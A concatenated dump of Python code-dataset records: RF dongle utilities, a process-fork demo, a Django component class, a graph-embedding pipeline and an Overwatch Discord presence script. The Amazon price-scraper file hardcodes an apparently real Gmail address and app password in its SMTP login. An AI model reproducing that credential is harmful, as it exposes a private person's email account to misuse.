Please try and re-record '\n 'your data source.'.format(significant_max), fg='red')\n return clean_data\n\n for samples in chunks(data, sample_border):\n\n # Determine new min, max and means for this sample range\n sample_minval, sample_maxval = numpy.amin(samples), numpy.amax(samples)\n sample_mean = numpy.mean([sample_minval, sample_maxval])\n\n # Debug\n # print(sample_minval, sample_maxval, sample_mean)\n\n # Ensure we have data in this sample range that is workable\n if significant_max > sample_maxval:\n # click.secho('Dont have data in minimum range.', fg='yellow')\n continue\n\n for value in samples:\n\n # print (value, sample_mean)\n if (value > 500) and (value > sample_mean):\n clean_data.append(1)\n continue\n\n clean_data.append(0)\n # Apply the clean_values function to the sample range\n # average_func = numpy.vectorize(clean_values)\n # clean_data.append(average_func(samples, numpy.mean([sample_minval, sample_maxval])))\n\n # return list(itertools.chain(*clean_data))\n return clean_data\n\n\ndef find_common_string(data):\n \"\"\"\n Derived from:\n http://stackoverflow.com/questions/25071766/find-most-common-sub-string-pattern-in-a-file?answertab=votes#tab-top\n\n :param data:\n :return:\n \"\"\"\n\n d = {}\n\n for n in range(1, len(data)):\n\n substr_counter = Counter(data[i: i + n] for i in range(len(data) - n))\n phrase, count = substr_counter.most_common(1)[0]\n if count == 1: # early out for trivial cases\n break\n\n # print 'Size: %3d: Occurrences: %3d Phrase: %r' % (n, count, phrase)\n d[n] = {'occurrences': count, 'phrase': phrase}\n\n return d\n\n\ndef configure_dongle(d, frequency, pktflen, baud, modulation=rflib.MOD_ASK_OOK,\n syncmode=0, lowball=False):\n \"\"\"\n Configure an instance of rflib.RFCat\n\n :param d:\n :param frequency:\n :param pktflen:\n :param baud:\n :param modulation:\n :param syncmode:\n :param lowball:\n :return:\n \"\"\"\n\n # Set the radio frequency\n if frequency is not None:\n d.setFreq(frequency)\n click.secho('[radio] Frequency: {}'.format(frequency), dim=True)\n\n # Set the rest of the values\n d.setMdmModulation(modulation)\n d.makePktFLEN(pktflen)\n d.setMdmDRate(baud)\n d.setMdmSyncMode(syncmode) # Disable preamble\n\n click.secho('[radio] MdmModulation: {}'.format(modulation), dim=True)\n click.secho('[radio] PktFLEN: {}'.format(pktflen), dim=True)\n click.secho('[radio] MdmDRate: {}'.format(baud), dim=True)\n click.secho('[radio] MdmSyncMode: {}'.format(syncmode), dim=True)\n\n # set the radio to lowest filtering mode\n if lowball:\n d.lowball()\n click.secho('[radio] Lowball: {}'.format(lowball), dim=True, bold=True)\n\n return\n","sub_path":"ooktools/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":6605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"406458904","text":"#! /usr/bin/env python3\n\nimport os, sys, time\n\npid = os.getpid()\n\nos.write(1, (\"\\nAbout to fork (pid:%d)\\n\" % pid).encode())\n\nrc = os.fork()\n\nif rc < 0:\n os.write(2, (\"fork failed, returning %d\\n\" % rc).encode())\n sys.exit(1)\nelif rc == 0: # child\n os.write(1, (\"Child: My pid==%d. Parent's pid=%d\\n\" % \n (os.getpid(), pid)).encode())\n time.sleep(1) # block for 1 second\n os.write(1, \"Child ....terminating now with exit code 0\\n\".encode())\n sys.exit(0)\nelse: # parent (forked ok)\n os.write(1, (\"Parent: My pid=%d. 
Child's pid=%d\\n\" % \n            (pid, rc)).encode())\n    childPidCode = os.wait() #Guessing wait returns PID of what you waited on\n    os.write(1, (\"Parent: Child %d terminated with exit code %d\\n\" % \n                 childPidCode).encode())\n\n\t\n#\t\"\"\"\n#\tTrace: \n#\t\tpid = 1\n#\t\t#write\n#\t\t\n#\t\t{Parent}\n#\t\trc = fork() ## which = 2 because its the pid of the forked program\n#\t\t\n#\t\telse:\n#\t\t\t#write\n#\t\t\tcPC = wait() which = 2 because its the pid of the waited program\n#\t\t\n#\t\t#After wait go to child\n#\t\t\n#\t\t\n#\t\t{Child}\n#\t\trc = 0 ## successful fork\n#\t\t\n#\t\telif: \n#\t\t\t#write\n#\t\t\t#sleep one second\n#\t\t\t#write:\n#\t\t\t#exit (Is this necessary?)\n#\t\t\t#after exit go back to wait in parent\n#\t\t\n#\t\t{Parent}\n#\t\t#write\n#\n#\t\"\"\"","sub_path":"demos/p2-wait.py","file_name":"p2-wait.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"589210986","text":"import requests\nfrom bs4 import BeautifulSoup\nimport smtplib\nimport time\n\n# set the base url\nURL = 'https://www.amazon.in/New-Apple-iPhone-12-128GB/dp/B08L5TNJHG/ref=sr_1_1_sspa?dchild=1&keywords=iphone+12&qid=1624987878&sr=8-1-spons&psc=1&spLa=ZW5jcnlwdGVkUXVhbGlmaWVyPUEyQ1NNMVJGNVRYNjUwJmVuY3J5cHRlZElkPUEwNjgxMDM1VUhYNkxURUdQQU5JJmVuY3J5cHRlZEFkSWQ9QTAzMjQ0MDAxRldNOFJGVVZYRkFTJndpZGdldE5hbWU9c3BfYXRmJmFjdGlvbj1jbGlja1JlZGlyZWN0JmRvTm90TG9nQ2xpY2s9dHJ1ZQ=='\n\n# set the headers and user string\nheaders = {\n    \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\"}\n\n\ndef check_price():\n\n    # fetch the HTML of the page\n    page = requests.get(URL, headers=headers)\n    soup = BeautifulSoup(page.content, 'html.parser')\n\n    # get the price and product title\n    title = soup.find(id=\"productTitle\").get_text()\n    price = soup.find(id=\"priceblock_dealprice\").get_text().replace(\n        ',', '').replace('₹', '').replace(' ', '').strip()\n\n    # converting the obtained string to float\n    converted_price = float(price[0:5])\n\n    # output the price and the product title\n    print(converted_price)\n    print(title.strip())\n\n    # check if the price dropped below the threshold\n    if(converted_price < 75000):\n        send_mail()\n\n\ndef send_mail():\n    # setting connection\n    server = smtplib.SMTP('smtp.gmail.com', 587)\n    server.ehlo()\n    # encryption\n    server.starttls()\n    server.ehlo()\n    server.login('siddharth007gandhi@gmail.com', 'ftgxhwqmefgidpqw')\n\n    # the connection is set\n\n    # make the content for the mail\n    subject = 'The price has dropped!!'\n    body = 'The link to the item is https://www.amazon.in/New-Apple-iPhone-12-128GB/dp/B08L5TNJHG/ref=sr_1_1_sspa?dchild=1&keywords=iphone+12&qid=1624987878&sr=8-1-spons&psc=1&spLa=ZW5jcnlwdGVkUXVhbGlmaWVyPUEyQ1NNMVJGNVRYNjUwJmVuY3J5cHRlZElkPUEwNjgxMDM1VUhYNkxURUdQQU5JJmVuY3J5cHRlZEFkSWQ9QTAzMjQ0MDAxRldNOFJGVVZYRkFTJndpZGdldE5hbWU9c3BfYXRmJmFjdGlvbj1jbGlja1JlZGlyZWN0JmRvTm90TG9nQ2xpY2s9dHJ1ZQ=='\n    msg = f\"Subject: {subject}\\n\\n{body}\"\n\n    # sending the mail\n    server.sendmail(\n        'siddharth007gandhi@gmail.com',\n        'siddharth007gandhi@gmail.com',\n        msg\n    )\n\n    print('sent the email !!')\n\n    server.quit()\n\n\n# call the price checking function once per 24 hrs or 1 day\nwhile(True):\n    check_price()\n    time.sleep(60*60*24)\n","sub_path":"scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} 
+{"seq_id":"325945817","text":"#linVregClass.py\nfrom .icClass import IC, ICTable\nfrom heodb import orderOfMagnitude\nfrom heodb.consts import bomConsts\n\nclass LinVRegTable(ICTable):\n\ttable = 'compLinVReg'\n\n\tdef __init__(self, db):\n\t\tICTable.__init__(self,db)\n\t\tself.linvreg_type = self.elementTable.addElement(title = 'Pos or Neg', \n\t\t\t\tname = 'linvreg_type', raiseWarnings = False, options = ('POS', 'NEG'))\n\t\tself.linvreg_ldo = self.elementTable.addElement(title = 'LDO', \n\t\t\t\tname = 'linvreg_ldo', elementType = 'BOOLEAN', raiseWarnings = False)\n\t\tself.linvreg_adj_volt = self.elementTable.addElement(title = 'Adjustable Voltage', \n\t\t\t\tname = 'linvreg_adj_volt', elementType = 'BOOLEAN', raiseWarnings = False)\n\t\tself.linvreg_vdropout = self.elementTable.addElement(title = 'Drop-Out Voltage', \n\t\t\t\tname = 'linvreg_vdropout', elementType = 'FLOAT', raiseWarnings = False)\n\t\tself.linvreg_accuracy = self.elementTable.addElement(title = 'Accuracy', \n\t\t\t\tname = 'linvreg_accuracy', elementType = 'FLOAT', raiseWarnings = False)\n\t\tself.linvreg_vin_min = self.elementTable.addElement(title = 'V_In Min', \n\t\t\t\tname = 'linvreg_vin_min', elementType = 'FLOAT', raiseWarnings = False)\n\t\tself.linvreg_vin_max = self.elementTable.addElement(title = 'V_In Max', \n\t\t\t\tname = 'linvreg_vin_max', elementType = 'FLOAT', raiseWarnings = False)\n\t\tself.linvreg_vout_min = self.elementTable.addElement(title = 'V_Out Min', \n\t\t\t\tname = 'linvreg_vout_min', elementType = 'FLOAT', raiseWarnings = False)\n\t\tself.linvreg_vout_max = self.elementTable.addElement(title = 'V_Out Max', \n\t\t\t\tname = 'linvreg_vout_max', elementType = 'FLOAT', raiseWarnings = False)\n\t\tself.linvreg_i_max = self.elementTable.addElement(title = 'I Max', \n\t\t\t\tname = 'linvreg_i_max', elementType = 'FLOAT', raiseWarnings = False)\n\n\tdef writeBomLine(self, bomLine):\n\t\tbomLine[bomConsts.bom_compSpec1] = self.linvreg_type.value\n\t\tbomLine[bomConsts.bom_compSpec2] = 'LDO' if self.linvreg_ldo.value == '1' else ''\n\t\tbomLine[bomConsts.bom_compSpec3] = 'ADJ' if self.linvreg_adj_volt.value == '1' else ''\n\t\tbomLine[bomConsts.bom_compSpec4] = \" Vin {}/{}\".format(orderOfMagnitude(self.linvreg_vin_min.value)[0], \n\t\t\t\torderOfMagnitude(self.linvreg_vin_max.value)[0])\n\t\tbomLine[bomConsts.bom_compSpec5] = \" Vout {}/{}\".format(orderOfMagnitude(self.linvreg_vout_min.value)[0], \n\t\t\t\torderOfMagnitude(self.linvreg_vout_max.value)[0])\n\t\tbomLine[bomConsts.bom_compSpec6] = \"{}A\".format(orderOfMagnitude(self.linvreg_i_max.value)[0])\n\n\t\treturn bomLine\n\n\tdef readBomLine(self, bomLine):\n\t\tself.linvreg_type.value = bomLine[bomConsts.bom_compSpec1].strip()\n\t\tif 'LDO' in bomLine[bomConsts.bom_compSpec2]:\n\t\t\tself.linvreg_ldo.value = 1 \n\t\telse:\n\t\t\tself.linvreg_ldo.value = 0\n\n\t\tif 'ADJ' in bomLine[bomConsts.bom_compSpec3]:\n\t\t\tself.linvreg_adj_volt.value = 1\n\t\telse:\n\t\t\tself.linvreg_adj_volt.value = 0\n\n\t\targ = bomLine[bomConsts.bom_compSpec4].strip().split(' ')[-1].split('/')\n\t\tself.linvreg_vin_min.value = arg[0]\n\t\tself.linvreg_vin_max.value = arg[1]\n\n\t\targ = bomLine[bomConsts.bom_compSpec5].strip().split(' ')[-1].split('/')\n\t\tself.linvreg_vout_min.value = arg[0]\n\t\tself.linvreg_vout_max.value = arg[1]\n\t\tself.linvreg_i_max.value = bomLine[bomConsts.bom_compSpec6]\n\n\t\tself.formatInput(self.getVals)\n\nclass LinVReg(IC):\n\tpart_type = 'V0'\n\tcomp_type = 'LINVREG'\n\tdef __init__(self, db):\n\t\tIC.__init__(self, 
db)\n\t\tself.db = db\n\t\tself.addComponentTable(LinVRegTable(db))\n\t\tself.posX = '10'\n\t\tself.posY = '20'\n\n\t@property\n\tdef comp_sub_type(self):\n\t\treturn None\n\nCompData = {'names': ('LVREG','LINVREG','LREG'), 'ComponentClass': LinVReg, 'isIC': True }\n","sub_path":"heodb/components/linVregClass.py","file_name":"linVregClass.py","file_ext":"py","file_size_in_byte":3556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"5121458","text":"from django.conf.urls import *\nfrom django.views.decorators.cache import cache_page\nfrom cera_data.ceracgi import cera_wms_tiled, cera_ani_tiled, cera_cgi, timesteps_forwarding, cera_wfs_forwarding\n\n# urls used for former cgi services\nurlpatterns = [ #patterns('cera_data.ceracgi',\n#    (r'cera_wms_tiled', cache_page(3600 * 24)(cera_wms_tiled.do_work)),\n    url(r'cera_wms_tiled', cera_wms_tiled.do_work),\n#    (r'cera_ani_tiled', cache_page(3600 * 24)(cera_ani_tiled.do_work)),\n    url(r'cera_ani_tiled', cera_ani_tiled.do_work),\n    url(r'cera_cgi', cera_cgi.do_generate_cera_html_dev),\n    url(r'cera_nc_cgi', cera_cgi.do_generate_cera_html_nc),\n    url(r'cera_ng_cgi', cera_cgi.do_generate_cera_html_ng),\n    url(r'cera_ri_cgi', cera_cgi.do_generate_cera_html_ri),\n    url(r'cera_timesteps_cgi', timesteps_forwarding.do_work),\n#    (r'cera_wfs_cgi', 'cera_wfs_cgi.do_work'),\n    url(r'cera_wfs', cera_wfs_forwarding.do_work)\n#    (r'(?P.*?)', 'cera_wms_tiled.do_work')\n]\n\n\n","sub_path":"django/cerarisk/cera_data/ceracgi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"524448465","text":"from pathlib import Path\n\nimport json\n\nfrom django.apps import apps\nfrom django.contrib.gis.geos import Polygon, MultiPolygon\n\nDATA_FILENAME = 'residential_area_data1.json'\n\n\ndef load_data():\n    # Resolve the model through the app registry so the script can run standalone\n    ResidentialArea = apps.get_model('schools', 'ResidentialArea')\n    jsonfile = \"./\" + DATA_FILENAME\n\n    with open(str(jsonfile)) as datafile:\n        objects = json.load(datafile)\n        for obj in objects['features']:\n            try:\n                objType = obj['geometry']['type']\n                properties = obj['properties']\n                objGeometry = obj['geometry']\n                name = properties.get('mvt_id', 'no-name')\n                coordinates = objGeometry.get('coordinates', [])\n                if objType == 'Polygon':\n\n                    location = MultiPolygon(Polygon(coordinates[0]), srid=4326)\n                    ResidentialArea(name=name, location=location).save()\n                elif objType == 'MultiPolygon':\n                    location = MultiPolygon(Polygon(coordinates[0][0]), srid=4326)\n                    ResidentialArea(name=name, location=location).save()\n            except KeyError:\n                pass\n\n\nload_data()\n","sub_path":"load_test.py","file_name":"load_test.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"472413639","text":"################################################################################\n# embedding_pipeline.py\n# Authors: Matt Rosen + Oliver Zhu\n# \n# Pipeline for isomorphism-aware embedding of weight matrices.\n################################################################################\n\n################################################################################\n# Imports\n########################################\nimport networkx as nx\nimport numpy as np \nimport subprocess\nimport pickle \nimport json\nimport glob\nimport sys\nimport os\n\n################################################################################\n# Utility 
functions\n########################################\ndef load_single_network_file(filename, simple_version = True):\n\n # Load data\n dat_dict = pickle.load(open(filename, 'rb'))\n\n # extract weight matrix, return\n if simple_version:\n return dat_dict['weights']['w_rnn']\n else:\n return dat_dict\n\n################################################################################\n# Main method\n########################################\nif __name__ == \"__main__\":\n\n # Import graphs\n N = 10 # number of networks total to load\n N_PER = 10 # number of networks of each type to load\n N_NEUR = 60 # number of neurons per network\n N_DIM = sys.argv[1] # number of dimensions for embedding\n\n # Load in dataset names\n task_list = ['DMS', 'DMRS180']\n fns = {}\n for task in task_list:\n #fns[task] = glob.glob(f\"./savedir/*/{task}*.pkl\")\n fns[task] = glob.glob(f\"/Volumes/My Passport/Lots of RNNs 1/*/{task}*.pkl\")\n\n # Ensure output folder exists\n if not os.path.exists(\"./dataset/\"):\n os.makedirs(\"./dataset/\")\n\n # Load our weight matrices + write to JSON\n nets = {}\n counter = 0\n metadata = []\n for task in task_list:\n choice_inds = np.random.choice(len(fns[task]), N // N_PER)\n for t, i in enumerate(choice_inds):\n all_params = load_single_network_file(fns[task][i], False)\n w_rnn = all_params['weights']['w_rnn']\n\n # Sparsify each network separately\n sparsity_fraction = 0.7\n sorted_inds = np.array([np.argsort(abs(w_rnn[net_id,:,:]), None) for net_id in range(w_rnn.shape[0])])\n\n to_remove = int(sparsity_fraction * N_NEUR * N_NEUR)\n for net_id in range(w_rnn.shape[0]):\n rows = sorted_inds[net_id, 0:to_remove] // N_NEUR\n cols = sorted_inds[net_id, 0:to_remove] % N_NEUR\n w_rnn[net_id, rows, cols] = 0\n\n # Convert each to JSON as expected for graph2vec; \n # 2 fields (edges, features)\n G = nx.DiGraph(np.squeeze(w_rnn[net_id, :, :]))\n edges = G.edges()\n edge_list = [[int(a[0]), int(a[1])] for a in edges]\n to_write = json.dumps({\"edges\": edge_list})\n with open(f\"dataset/{counter}.json\", 'w') as f:\n f.write(to_write)\n\n # Save metadata (e.g. 
network name/type)\n metadata.append(f\"{str(counter)} {fns[task][i][36:]}\")\n counter += 1\n\n with open(\"metadata.txt\", 'w') as f:\n f.write(\"\\n\".join(metadata))\n\n # Invoke the command to run graph2vec through subprocess.call\n subprocess.call([\"python3\", \"../graph2vec/src/graph2vec.py\", \n \"--input-path\", \"./dataset/\", \n \"--output-path\", \"embeddings.csv\",\n \"--dimensions\", str(N_DIM)])\n","sub_path":"embedding_pipeline.py","file_name":"embedding_pipeline.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"55871668","text":"import time\nimport FWCore.ParameterSet.Config as cms\nfrom FWCore.ParameterSet.VarParsing import VarParsing\nfrom Configuration.AlCa.GlobalTag import GlobalTag\nfrom IOMC.RandomEngine.RandomServiceHelper import RandomNumberServiceHelper\nfrom FastTiming.RecoTreeUtils.IOFilesHelper import *\n\noptions = VarParsing('analysis')\n\noptions.register('sampleName',\n 'SingleGammaE50_noPU',\n VarParsing.multiplicity.singleton,\n VarParsing.varType.string,\n \"sample to process\")\noptions.maxEvents = -1\noptions.parseArguments()\n\n## Get I/O files from the list given the sample name\nfilesOpt = cms.PSet(\n inputFiles = cms.untracked.vstring(\"\"),\n outputFile = cms.string(\"\")\n)\n\nGetSampleFiles(options.sampleName, \"\", filesOpt)\n\n##------------------------------------------------------------------------------\n\nprocess = cms.Process(\"RecoFastTiming\")\n\n# randomness\nprocess.RandomNumberGeneratorService = cms.Service(\"RandomNumberGeneratorService\",\n VtxSmeared = cms.PSet(\n initialSeed = cms.untracked.uint32(1),#int(time.time()%100000//1)),\n engineName = cms.untracked.string('TRandom3')\n )\n)\n\nrandHelper = RandomNumberServiceHelper(process.RandomNumberGeneratorService)\nrandHelper.populate()\n\n## load the SK geometry and magnetic field config\nprocess.load('Configuration.Geometry.GeometryExtended2023SHCalNoTaperReco_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_38T_PostLS1_cff')\nprocess.load('Configuration/StandardSequences/FrontierConditions_GlobalTag_cff')\n## import standard RecoFT configurations\nprocess.load(\"IOMC.EventVertexGenerators.GhostVtxSmearedHLLHC_cfi\")\nprocess.load(\"FastTiming.RecoTreeUtils.RecoFastTiming_cff\")\n\n#process.RecoFastTiming.makeGhosts = cms.untracked.bool(True);\n\nprocess.GlobalTag = GlobalTag(process.GlobalTag, 'auto:upgradePLS3', '')\n\nprocess.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(options.maxEvents))\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = filesOpt.inputFiles)\n\nprocess.source.duplicateCheckMode = cms.untracked.string('noDuplicateCheck')\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = filesOpt.outputFile)\n\n#process.ft_path = cms.Sequence(process.VtxSmeared+process.RecoFastTiming)\nprocess.ft_path = cms.Sequence(process.RecoFastTiming)\n\nprocess.path = cms.Path(process.ft_path)\n\nprocess.schedule = cms.Schedule(process.path)#, process.FEVTDEBUGoutput_step)\n\n","sub_path":"RecoTreeUtils/test/RecoFastTiming_cfg.py","file_name":"RecoFastTiming_cfg.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"360368956","text":"import os\nimport random \nfrom .folder_profile import folder_name as profile_folder_name\nfrom .folder_post import folder_name as post_folder_name\nimport string\nfrom random import choice\n\ndef 
get_file_extension(filename):\n basename = os.path.basename(filename)\n base, ext = os.path.splitext(basename)\n return base, ext\n\ndef upload_image_path(instance,filename): \n new_file = random.randint(1, 39515623) \n basename, ext = get_file_extension(filename)\n filename = \"{new_file_name}{ext}\".format(new_file_name=new_file,ext=ext)\n \n if instance.__class__.__name__ == 'PostExtraImage':\n\n folder_name = post_folder_name\n return \"{folder_name}/{username}/{new_filename}/{filename}\".format(\n folder_name=folder_name, username = instance.post.user, new_filename=new_file, filename=filename\n )\n \n if instance.__class__.__name__ == \"Post\": \n folder_name = post_folder_name\n\n elif instance.__class__.__name__ == \"Profile\":\n folder_name = profile_folder_name\n \n return \"{folder_name}/{username}/{new_filename}/{filename}\".format(\n folder_name=folder_name, username = instance.user, new_filename=new_file, filename=filename\n )\n \ndef generate_slug(): \n random = string.ascii_uppercase + string.ascii_lowercase + string.digits \n return ''.join(choice(random) for _ in range(15))\n\ndef get_absolute_uri(self,post):\n request = self.context.get('request')\n attribute_url = post.image.url \n return request.build_absolute_uri(attribute_url)","sub_path":"post/utils/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"208594459","text":"from django.shortcuts import render\nfrom realtors.models import Realtor \nfrom listings.models import Listing \nfrom listings.choices import bedroom_choices, price_choices, state_choices\n# Create your views here.\ndef home(request):\n\tlistings = Listing.objects.order_by('-list_date').filter(is_published=True)[:3]\n\tcontext = {\n\t\t'listings' \t\t\t: listings,\n\t\t'state_choices'\t\t: state_choices,\n\t\t'bedroom_choices'\t: bedroom_choices,\n\t\t'price_choices' \t: price_choices,\n\t}\n\treturn render(request, 'pages/home.html',context)\n\ndef about(request):\n\trealtors = Realtor.objects.all()\n\tcontext = {\n\t\t'realtors': realtors\n\t}\n\treturn render(request, 'pages/about.html', context)","sub_path":"btre/pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"461538836","text":"class UpdateDataIntegrationModel:\n def __init__(self,\n Code: str = None,\n SourceConnectionName: str = None,\n SourceSchema: str = None,\n SourceTableName: str = None,\n SourceQuery: str = None,\n TargetConnectionName: str = None,\n TargetSchema: str = None,\n TargetTableName: str = None,\n TargetQuery: str = None,\n IsTargetTruncate: bool = None,\n IsDelta: bool = None,\n Comments: str = None,\n SourceColumns: str = None,\n TargetColumns: str = None,\n PreExecutions: str = None,\n PostExecutions: str = None,\n ):\n self.Code: str = Code\n self.SourceConnectionName: str = SourceConnectionName\n self.SourceSchema: str = SourceSchema\n self.SourceTableName: str = SourceTableName\n self.SourceQuery: str = SourceQuery\n self.TargetConnectionName: str = TargetConnectionName\n self.TargetSchema: str = TargetSchema\n self.TargetTableName: str = TargetTableName\n self.TargetQuery: str = TargetQuery\n self.IsTargetTruncate: bool = IsTargetTruncate\n self.IsDelta = IsDelta\n self.Comments: str = Comments\n self.SourceColumns: str = SourceColumns\n self.TargetColumns: str = TargetColumns\n self.PreExecutions: str = 
PreExecutions\n self.PostExecutions: str = PostExecutions\n","sub_path":"models/viewmodels/integration/UpdateDataIntegrationModel.py","file_name":"UpdateDataIntegrationModel.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"366726363","text":"try:\n from owrpcConfig import maps as maps\n from owrpcConfig import misc as conf\n from owrpcConfig import col as col\n from pypresence import Presence\n import time\n import sys\n from random import randint\n from datetime import datetime as dt\nexcept Exception as e:\n import sys\n print(\"You need to install all the dependencies!\")\n print(\"Head back to the repo (https://github.com/maxicc/overwatch-rpc) to learn more.\")\n sys.exit(0)\n\nrpc = Presence(conf.clientid) # Initialize the client class\nrpc.connect() # Start the handshake loop\n\nowquotes = [\"Cheers, love! The cavalry's here!\",\"¡Apagando las luces!\",\"Old soldiers are hard to kill.\",\"Clear skies, full hearts, can't lose.\",\"Initiating the hack.\",\"Your guardian angel.\",\"It's in the refrigerator.\",\"Look out world, Tracer's here!\",\"Nerf this!\",\"Fire in the hole!\",\"Die, die, die!\",\"Justice rains from above!\",\"I will be your shield!\"]\n\nclass globals():\n ingame = 0\n map = ''\n mode = ''\n\ndef buildlist(source):\n list = ''\n for x in source.keys():\n if list == '':\n list = \"'\" + x + \"'\"\n else:\n list = list + \", '\" + x + \"'\"\n return list\n\ndef buildstrings(mode,mapinfo,sr,rank):\n state = mapinfo[1] + \" on \" + mapinfo[0]\n details = \"Playing \" + maps.modes[mode][0]\n largeimg = mapinfo[2]\n largecpt = mapinfo[0]\n if mode == \"competitive\":\n smallimg = rank\n smallcpt = str(sr) + \" SR\"\n return state, details, largeimg, largecpt, smallimg, smallcpt\n else:\n return state, details, largeimg, largecpt\n\ndef clear():\n print(col.info + \"Setting your presence to In Menus...\")\n try:\n rpc.update(state=\"In Menus\",large_image=\"overwatch\",large_text=\"Overwatch\",start=int(time.time()))\n print(col.success + \"Done! Discord may take a few seconds to update.\")\n except Exception as e:\n print(col.fail + \"Failed to clear your presence!\")\n print(col.fail + \"pypresence says: \" + str(e))\n return\n return\n\ndef endgame(state):\n if globals.ingame == 0:\n print(col.fail + \"You haven't played a game recently! Setting your status to In Menus...\")\n state = \"x\"\n try:\n if state == \"w\":\n rpc.update(details=\"In Menus\",state=\"WON a game on \" + globals.map + \" in \" + globals.mode,large_image=\"overwatch\",large_text=\"Overwatch\",start=int(time.time()))\n elif state == \"l\":\n rpc.update(details=\"In Menus\",state=\"LOST a game on \" + globals.map + \" in \" + globals.mode,large_image=\"overwatch\",large_text=\"Overwatch\",start=int(time.time()))\n elif state == \"d\":\n rpc.update(details=\"In Menus\",state=\"DREW a game on \" + globals.map + \" in \" + globals.mode,large_image=\"overwatch\",large_text=\"Overwatch\",start=int(time.time()))\n else:\n rpc.update(details=\"In Menus\",large_image=\"overwatch\",large_text=\"Overwatch\",start=int(time.time()))\n print(col.success + \"Done! 
Discord may take a few seconds to update.\")\n return\n except Exception as e:\n print(col.fail + \"Couldn't set your presence.\")\n print(col.fail + \"pypresence says: \" + str(e))\n\ndef info():\n print(col.info + \"Overwatch RPC Client Version \" + conf.version)\n print(col.smile + \"Created by github.com/maxicc\")\n print(col.blank)\n print(col.info + \"Available commands:\")\n print(col.info + \"!help - displays this help menu, duh.\")\n print(col.info + \"!newgame - configure a new game for your presence.\")\n print(col.info + \"!menus - sets In Menus as your presence.\")\n print(col.info + \"!win, !loss, !draw - sets In Menus with the outcome of your last game.\")\n print(col.info + \"!fullclear - remove the presence from your Discord.\")\n print(col.info + \"!quit - closes the application.\")\n print(col.info + \"!iwanttospeaktothemanager - provides the GitHub Issues link.\")\n return\n\ndef fullclear():\n print(col.info + \"Fully clearing Discord presence...\")\n try:\n rpc.clear()\n print(col.success + \"Done! Discord may take a few seconds to update.\")\n except Exception as e:\n print(col.fail + \"Failed to clear your presence!\")\n print(col.fail + \"pypresence says: \" + str(e))\n return\n return\n\ndef newgame():\n fullclear()\n modes = buildlist(maps.modes)\n print(col.info + \"What gamemode are you playing?\")\n print(col.info + \"The available gamemodes are: \" + modes)\n\n badinput = 1\n while badinput == 1:\n user = input(col.ask)\n if user not in maps.modes:\n print(col.warn + \"That's not a valid mode. The valid modes are \" + modes + \".\")\n continue\n else:\n badinput = 0\n mode = user\n mapset = maps.modes[user][1]\n continue\n\n print(col.success + \"You selected \" + maps.modes[mode][0] + \".\")\n\n if mapset == 'standard':\n mapsl = buildlist(maps.standard)\n elif mapset == 'both':\n maps1 = buildlist(maps.standard)\n maps2 = buildlist(maps.arcade)\n mapsl = maps1 + \", \" + maps2\n\n print(col.info + \"What map are you playing on?\")\n print(col.info + \"The available maps are: \" + mapsl)\n\n badinput = 1\n while badinput == 1:\n user = input(col.ask)\n if mapset == 'standard':\n if user not in maps.standard:\n print(col.warn + \"That's not a valid map. Try again.\")\n continue\n else:\n badinput = 0\n map = user\n mapinfo = maps.standard[user]\n print(col.success + \"You selected map \" + maps.standard[user][0] + \".\")\n continue\n elif mapset == 'both':\n if user not in maps.standard and user not in maps.arcade:\n print(col.warn + \"That's not a valid map. 
Try again.\")\n continue\n elif user in maps.standard:\n badinput = 0\n map = user\n mapinfo = maps.standard[user]\n print(col.success + \"You selected map \" + maps.standard[user][0] + \".\")\n continue\n elif user in maps.arcade:\n badinput = 0\n map = user\n mapinfo = maps.arcade[user]\n print(col.success + \"You selected map \" + maps.arcade[user][0] + \" (arcade).\")\n continue\n else:\n print(col.fail + \"This shouldn't happen!\")\n sys.exit(1)\n else:\n print(col.fail + \"This shouldn't happen!\")\n sys.exit(1)\n\n if mode == \"competitive\":\n print(col.info + \"What is your skill rating (SR)?\")\n sr = input(col.ask)\n try:\n sr = int(sr)\n if sr < 1:\n raise ValueError # a sub-1 SR would otherwise leave 'rank' unset below\n elif sr > 0 and sr < 1500:\n rank = \"bronze\"\n elif sr > 1499 and sr < 2000:\n rank = \"silver\"\n elif sr > 1999 and sr < 2500:\n rank = \"gold\"\n elif sr > 2499 and sr < 3000:\n rank = \"platinum\"\n elif sr > 2999 and sr < 3500:\n rank = \"diamond\"\n elif sr > 3499 and sr < 4000:\n rank = \"masters\"\n elif sr > 3999 and sr <= 5000:\n rank = \"grandmaster\"\n else:\n raise ValueError\n except Exception as e:\n print(col.fail + \"You didn't enter a valid SR!\")\n print(col.warn + \"Defaulting to BRONZE rank... since you probably belong there anyway.\")\n sr = 